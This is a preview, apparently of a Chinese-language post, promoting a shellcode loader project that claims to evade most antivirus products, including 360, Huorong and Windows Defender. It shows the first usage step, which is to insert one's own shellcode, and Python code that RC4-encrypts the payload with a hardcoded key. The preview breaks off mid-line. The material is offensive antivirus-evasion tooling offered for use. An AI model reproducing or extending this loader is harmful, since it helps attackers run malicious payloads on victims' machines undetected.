文章预览
项目介绍 此项目是 一个简单的远程分离的加载器,免杀国内大部分杀软(360、火绒、Windows Defender、金山毒霸、电脑管家) 项目使用 Step 1: 修改Encryption/payload_c_x64.py的24行,改为自己的shellcode def rc4_encrypt (data, key) : S = list(range( 256 )) j = 0 # Key-scheduling algorithm (KSA) for i in range( 256 ): j = (j + S[i] + key[i % len(key)]) % 256 S[i], S[j] = S[j], S[i] # Pseudo-random generation algorithm (PRGA) & encryption i = j = 0 result = bytearray() for byte in data: i = (i + 1 ) % 256 j = (j + S[i]) % 256 S[i], S[j] = S[j], S[i] k = S[(S[i] + S[j]) % 256 ] result.append(byte ^ k) return result def main () : # 原始的payload(cale.exe) payload = b"你的shellcode" # 加密密钥 key = b"thisIsA16ByteKey" # 16字节密钥 # 使用RC4算法加密payload encrypted_payload = r
………………………………
